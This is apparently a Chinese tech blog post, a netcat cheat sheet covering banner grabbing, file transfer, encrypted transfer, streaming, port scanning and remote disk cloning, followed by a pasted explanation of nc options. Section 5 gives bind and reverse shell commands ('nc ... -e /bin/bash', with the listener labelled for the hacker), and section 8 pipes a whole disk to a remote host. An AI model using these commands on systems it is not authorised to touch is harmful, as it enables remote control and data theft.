瑞士军刀NC(NETCAT)常用方法

1、NC(NETCAT)

NC分为被动监听/主动连接模式

1.telnet/获取banner信息

nc -nv 192.168.1.1 80
nc -nv ip port
#-n 参数为不进行dns解析
#-v 显示详细信息

2.传输文本

服务端:nc -lvp 4444
#-l 监听模式
#-p 设置监听端口
客户端:nc -nv 192.168.1.1 4444

nc -lvp 333 > ps.txt
ps -aux | nc -nv 192.168.1.1 333 -q 1
#-q 1 传输完毕后延迟1秒后退出

nc -lvp 333 > lsof.txt
lsof | nc -nv 192.168.1.1 333 -q 1
#lsof 列出当前系统打开文件
#ps 列出当前用户进程

3.传输文件/目录

nc -lvp 6666 > 1.mp4
nc -nv 192.168.1.1 6666 < 1.mp4 -q 1
或
nc -lvp 6666 < 1.mp4
nc -nv 192.168.1.1 6666 > 1.mp4

tar -cvf - music/ | nc -lvp 333 -q 1
nc -nv 192.168.1.1 333 | tar -xvf -

4.加密传输

nc -lvp 333 | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > 1.mp4
mcrypt --flush -Fbq -a rijndael-256 -m ecb < 1.mp4 | nc -nv 192.168.1.1 -q 1

5.远程控制(通过NC反弹shell)

Linux主机反弹shell

正向:

nc -lvp Lport -e /bin/bash   
nc Rhost Rport       //hacker

image-20210224220542884

反向:

nc Rhost Rport -e /bin/bash
nc -lvp Lport                   //hacker

image-20210224220628332

Windows主机需要将bash改为cmd

6.加密流量

参考加密传输

未加密抓包抓到的是明文

image-20210224222312716

7.流媒体服务器

nc.exe -lvp 6666 < 1.mp4
nc -nv 192.168.198.1 6666 | mplayer -vo x11 -cache 3000 -

8.远程克隆硬盘

远程取证,可以克隆目标服务器硬盘,或内存

nc -lvp 333 | dd of=/dev/sda
dd if=/dev/sda | nc -nv 192.168.1.1 333 -q 1

9.端口扫描

nc -nvz 192.168.1.1 1-65535
#TCP扫描
nc -nvzu 192.168.1.1 1-1024
#UDP扫描
什么是nc ncnetcat的简写,有着网络界的瑞士军刀美誉。因为它短小精悍、功能实用,被设计为一个简单、可靠的网络工具 nc的作用 (1)实现任意TCP/UDP端口的侦听,nc可以作为server以TCP或UDP方式侦听指定端口 (2)端口的扫描,nc可以作为client发起TCP或UDP连接 (3)机器之间传输文件 (4)机器之间网络测速                                                                                                                                                                                                                         nc的控制参数不少,常用的几个参数如下所列: 1) -l 用于指定nc将处于侦听模式。指定该参数,则意味着nc被当作server,侦听并接受连接,而非向其它地址发起连接。 2) -p 暂未用到(老版本的nc可能需要在端口号前加-p参数,下面测试环境是centos6.6,nc版本是nc-1.84,未用到-p参数) 3) -s  指定发送数据的源IP地址,适用于多网卡机  4) -u  指定nc使用UDP协议,默认为TCP 5) -v 输出交互或出错信息,新手调试时尤为有用 6)-w 超时秒数,后面跟数字  7)-z 表示zero,表示扫描时不发送任何数据       前期准备 准备两台机器,用于测试nc命令的用法 主机A:ip地址 10.0.1.161 主机B:ip地址 10.0.1.162   两台机器先安装nc和nmap的包 yum install nc -y yum install nmap -y 如果提示如下-bash: nc: command not found 表示没安装nc的包 ———————————————— 版权声明:本文为CSDN博主「小毛毛2013」的原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接及本声明。 原文链接:https://blog.csdn.net/u012486730/article/details/82019996
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值